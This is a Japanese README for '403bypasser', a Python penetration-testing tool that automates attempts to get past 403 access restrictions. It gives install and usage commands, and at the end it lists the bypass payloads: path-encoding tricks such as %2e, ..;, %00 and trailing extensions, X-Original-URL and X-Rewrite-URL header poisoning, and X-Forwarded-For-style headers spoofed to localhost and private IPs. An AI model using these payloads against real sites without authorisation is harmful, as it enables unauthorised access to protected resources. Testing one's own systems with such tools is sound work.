
403bypasserは、対象ページのアクセス制限制限を回避するために使用される手法を自動化します。このツールは引き続き改善され、貢献を受け付けています。
403bypasserは、対象ページのアクセス制限制限を回避するために使用される手法を自動化します。403bypasserは引き続き改善され、貢献を受け付けています。
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txt引数:
| 引数 | 説明 | 例 | 注記 |
|---|---|---|---|
| -u | スキャンする単一のURL | http://example.com または http://example.com/ | これらの使用例はすべて同じように解釈されます |
| -U | URLリストのパス | ./urllist.txt, ../../urllist.txt など | ファイルが置かれているパスを指定するだけです :) |
| -d | スキャンする単一のディレクトリ | admin または /admin または admin/ または /admin/ | これらの使用例はすべて同じように解釈されます |
| -D | ディレクトリリストのパス | ./dirlist.txt, ../../dirlist.txt など | ファイルが置かれているパスを指定するだけです :) |
使い方 1: python3 403bypasser.py -u https://example.com -d /secret
使い方 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
使い方 3: python3 403bypasser.py -U urllist.txt -d /secret
使い方 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
重要な注意: 以下のものはすべて同じように解釈されます。そのため、どのパターンを使用するかは単なる好みの問題です。
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secretPythonはクロスプラットフォーム言語であるため、このプログラムをさまざまなオペレーティングシステムで実行できます。
プログラムの出力は、入力として与えられたドメイン名の名前で(現在のディレクトリに)ファイルに保存されます。
例:
python3 403bypasser.py -u https://example.com -d /secret が指定された場合、出力は現在のディレクトリの example.txt に保存されます。
v2.0での変更: このバージョンでは大幅な変更が行われました。プロジェクトはBashから完全にPython 3に移行しました。新しい多様な手法が追加されました。
v1.1での変更: 引数を使用してファイル(リスト)を403bypasserに入力として渡すことが可能になりました。さらに、2つのテストケースが追加されました:
X-Original-URL および 2) X-Rewrite-URL ヘッダーを使用したポイズニング。/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparam/secret#/secret#test/secret/.//secret///./secret/./X-Original-URL: /secretX-Rewrite-URL: /secretヘッダー:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IP値:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0172.16.0.1192.168.1.0192.168.1.1